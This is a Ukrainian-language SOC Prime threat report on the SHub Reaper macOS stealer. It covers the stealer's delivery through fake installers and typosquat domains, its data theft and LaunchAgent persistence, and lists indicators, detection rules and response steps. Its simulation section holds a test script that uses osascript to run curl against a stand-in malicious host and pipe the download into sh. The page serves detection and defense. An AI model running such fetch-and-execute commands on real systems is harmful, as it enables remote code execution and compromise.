SOC Prime Bias: Середній

20 May 2026 22:15 UTC

SHub Reaper | macOS Stealer підробляє Apple, Google та Microsoft в єдиному ланцюжку атак

Author Photo
SOC Prime Team linkedin icon Стежити
SHub Reaper | macOS Stealer підробляє Apple, Google та Microsoft в єдиному ланцюжку атак
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

У звіті аналізується новий варіант інфоркрадача для macOS під назвою SHub Reaper, який використовує підроблені інсталяційні файли WeChat та Miro для доставки шкідливого AppleScript через домен-топоклонку в стилі Microsoft. Після запуску в Редакторі скриптів цей шкідливий код збирає дані браузера, файли криптовалютних гаманців та інформацію у зв’язці ключів, а потім ексфільтрує викрадений вміст у вигляді сегментованих архівів ZIP. Зловмисне програмне забезпечення також втручається у файли гаманців і встановлює стійкість через LaunchAgent, замаскований під оновлення програмного забезпечення Google. Рекомендовано зосередитись на виявленні виконання AppleScript, створенні підозрілих LaunchAgent та вихідному трафіку до відомої інфраструктури командування і управління.

Дослідження

SentinelOne відстежив повний багатоетапний ланцюжок доставки, включаючи зловживання схемою applescript:// , динамічну генерацію AppleScript та модуль захоплення файлів, що імітує поведінку крадіжки документів, як видно в AMOS. Дослідники зафіксували мережевий трафік до домену командування і управління hebsbsbzjsjshduxbs.xyz та пов’язаних з ним кінцевих точок, а також створення тимчасових файлів у /tmp та LaunchAgent, розміщеного в каталозі бібліотеки користувача. Дослідження також виявило жорстко закодовану функціональність Telegram-бота, яка використовується для телеметрії оператора.

Заходи

Захисникам слід блокувати доступ до доменів mlcrosoft.co.com, qq-0732gwh22.com, та mlroweb.com, а також стежити за LaunchAgent, створеними за шляхами, що імітують компоненти оновлень Google. Слід використовувати вказувальний список дозволених додатків, щоб обмежити виконання AppleScript з ненадійних джерел, і суворо дотримуватись перевірки підпису коду. Мережеві виявлення також повинні сповіщати про зв’язок з ідентифікованим командним доменом та відомими API шляхами.

Відповідь

Якщо виявлено активність SHub Reaper, негайно ізолюйте уражену кінцеву точку, завершите будь-які підозрілі процеси AppleScript або LaunchAgent та видаліть шкідливі файли із /tmp та бібліотеки користувача. Дослідники потім повинні провести повну форензичну збірку магазинів даних браузера, директорій гаманців та сховищ облікових даних, з подальшою зміною облікових даних при підозрі на компрометацію. Ідентифікована інфраструктура командування і контролю повинна бути заблокована, а команда реагування на інциденти має розпочати більш широке полювання на загрози в середовищі.

Потік атаки

Виявлення

Можлива спроба перегляду IP-адрес домену (через dns)

Команда SOC Prime
20 травня 2026

Примусове підписання коду модифікованого пакету додатків (через cmdline)

Команда SOC Prime
20 травня 2026

Утиліта архівації MacOS вказує на підозрілий каталог (через cmdline)

Команда SOC Prime
20 травня 2026

Підозріла спроба виконання curl [MacOS] (через cmdline)

Команда SOC Prime
20 травня 2026

Архів був створений у тимчасовій папці MacOS (через file_event)

Команда SOC Prime
20 травня 2026

Можливе маніпулювання закодованими рядками Base64 (через cmdline)

Команда SOC Prime
20 травня 2026

Індикатори компрометації (HashSha256) для виявлення: SHub Reaper | macOS Stealer імітує Apple, Google та Microsoft в одній ланцюжку атаки

Правила SOC Prime AI
20 травня 2026

Індикатори компрометації (HashMd5) для виявлення: SHub Reaper | macOS Stealer імітує Apple, Google та Microsoft в одній ланцюжку атаки

Правила SOC Prime AI
20 травня 2026

Виявлення ланцюга інфікування SHub Reaper з використанням доменів-топоклонок і C2 [Webserver]

Правила SOC Prime AI
20 травня 2026

Виявлення виконання зловмисного ПЗ SHub Reaper через AppleScript та Curl [Linux Process Creation]

Правила SOC Prime AI
20 травня 2026

Виконання симуляції

Попередня умова: Телеметрія та перевірка базового стану перед польотом повинні були пройти.

Мотивація: Цей розділ детально описує точне виконання техніки супротивників (TTP), призначену для ініціювання правила виявлення. Команди та наративи ПОВИННІ безпосередньо відображати ідентифіковані TTP та націлюватися на генерування точної телеметрії, очікуваної логікою виявлення. Абстрактні чи недоречні приклади призведуть до неправильної діагностики.

  • Розповідь про атаку та команди:
    Атакуючий створює лаконічну команду, яка використовує osascript для виконання команди оболонки. У межах AppleScript do shell script запускає curl щоб завантажити віддалений скрипт оболонки (payload.sh) і одразу передає його sh для виконання. Оскільки весь ланцюжок вбудований у єдине викликання AppleScript, macOS логує один process_creation подію, чия командна лінія містить обидва osascript and curl, задовольняючи правило виявлення.

  • Регресивний тестовий скрипт:

    #!/bin/bash
    #
    # Імітує виконання SHub Reaper на macOS
    # Генерує одну подію process_creation, що містить 'osascript' та 'curl'
    #
    MALICIOUS_URL="https://malicious.example.com/payload.sh"
    
    # Однорядкове: osascript запускає команду оболонки, що завантажує навантаження і виконує його
    osascript -e "do shell script "curl -s ${MALICIOUS_URL} | sh""
  • Команди очищення:

    #!/bin/bash
    #
    # Очистити всі артефакти, створені симуляцією.
    # Навантаження виконується в пам'яті і не записує файли, але ми впевнюємося, що немає залишкових процесів.
    #
    # Вбити всі сторонні процеси 'sh', запущені тестом (використовувати обережно в робочих системах)
    pkill -f "sh -c curl -s https://malicious.example.com/payload.sh"